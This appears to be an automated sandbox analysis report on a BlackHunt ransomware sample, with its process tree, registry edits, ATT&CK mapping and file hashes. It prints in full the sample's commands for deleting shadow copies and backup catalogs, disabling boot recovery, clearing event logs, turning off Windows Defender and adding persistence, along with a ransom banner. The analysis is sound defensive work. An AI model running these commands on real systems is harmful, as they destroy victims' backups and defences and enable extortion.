34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe 133 PID 2196 wrote to memory of 1192 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe 133 PID 2196 wrote to memory of 1192 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe 133 PID 2196 wrote to memory of 1192 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe 133 PID 2196 wrote to memory of 2532 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe 131 PID 2196 wrote to memory of 2532 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe 131 PID 2196 wrote to memory of 2532 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe 131 PID 2196 wrote to memory of 2532 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe 131 PID 2196 wrote to memory of 2416 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe 128 PID 2196 wrote to memory of 2416 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe 128 PID 2196 wrote to memory of 2416 2196 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe 128 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe"C:\Users\Admin\AppData\Local\Temp\34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2196 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2800
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:2396
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:1508
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2408
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:1948
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1744
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:412
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:1444
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:556
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:1268
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:780
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:2208
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:1492
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:1852
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2852
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe" /F2⤵PID:2824
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1080
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1180
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2608
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:1064
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:2020
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:2000
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:2660
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2692
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2372
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:1800
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2980
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2964
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2472
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2416
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2532
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1192
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2580
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2552
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2712
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2572
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2644
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:2616
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:2788
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2124
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2132
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2176
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:5076
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:3240
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:3168
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:2256
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3372
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:3292
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3432
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:2600
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:3268
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:1228
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:3524
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:3400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:3536
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:3596
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:3956
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:2916
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:4196
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:804
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2736
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:3632
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:3880
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe"2⤵
- Deletes itself
PID:3340 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:3672
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:3744
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2320
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:3604
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:3628
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:1068
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:5104
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:3624
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:3316
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:3572
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:5024
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:3216
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:5032
-
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:276
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:1192
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:1748
-
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB1⤵
- Interacts with shadow copies
PID:480
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures1⤵
- Modifies boot configuration data using bcdedit
PID:1716
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:1⤵
- Deletes NTFS Change Journal
PID:1656
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1528
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:836
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:2268
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable1⤵PID:2936
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet1⤵
- Deletes backup catalog
PID:1640
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No1⤵
- Modifies boot configuration data using bcdedit
PID:1648
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f1⤵PID:2588
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f1⤵PID:3068
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded1⤵
- Interacts with shadow copies
PID:2944
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:2116
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1056
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f1⤵PID:1980
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:1728
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f1⤵PID:1976
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:1844
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f1⤵PID:1092
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\34f2c8107643bae73e8fdfdc3f17185da3862e8fb9e6500d665b1324ced3cc39.exe" /F1⤵
- Creates scheduled task(s)
PID:1152
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f1⤵PID:1280
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f1⤵PID:600
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f1⤵PID:1876
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f1⤵PID:776
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f1⤵PID:384
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f1⤵PID:2272
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f1⤵PID:268
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f1⤵PID:2860
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f1⤵PID:2680
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f1⤵PID:1196
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f1⤵
- Modifies Windows Defender Real-time Protection settings
PID:1200
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f1⤵PID:2684
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f1⤵PID:1952
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f1⤵
- Adds Run key to start application
PID:2968
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵
- Modifies registry class
PID:2420
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵
- Modifies registry class
PID:3048
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f1⤵
- Modifies registry class
PID:2880
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f1⤵
- Modifies registry class
PID:2512
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\1⤵PID:3196
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\1⤵
- Enumerates connected drives
PID:2652
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:5084
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f1⤵PID:3204
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F1⤵PID:3808
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:1⤵
- Deletes NTFS Change Journal
PID:4176
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable1⤵PID:3684
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2424
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:3532
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5e175f9177dddfbff476baf6f50fd9d4d
SHA185d9496495c4cbf628eed34ab906f271db617f30
SHA256a6ad431dc9c04e9728c5dd40c88d1727bd81c06a5e61c6d6d0d6e67c08407a89
SHA51259b5af22dd18ff96f723032f160cd74e08c89befc5057053e9574f660b4b7421772f46dfb2994202be9c83fb32d63334d940c2c733bcefd284c886ac645484cf
-
Filesize
12KB
MD5f9647a513e84e1cddfb0e1faf43c3714
SHA1908ef79b03660fab74573c7a84e1161e174d963a
SHA256a51a33658778ecc62ceb5458d021e9ec6101f8011d5b96b1b1636b408bd6f198
SHA512b0190a6b0149b0ac7792d69d20be81074ba0c674a8b6c34f8185c1a2b2a75e8fb974f786a5276997f4dc5601c00494d18c4be4459ca4baea2a2d9afd0b3469d1
-
Filesize
684B
MD5e99c3da117094144dad4bdf089d9a403
SHA1d9f69d6cf7038d7e4a07f1735884b9088b1b1ed4
SHA256aedfe1770694245aa08db64e1ac5245740ab8375d2e3f9f4fd04101c1305de7c
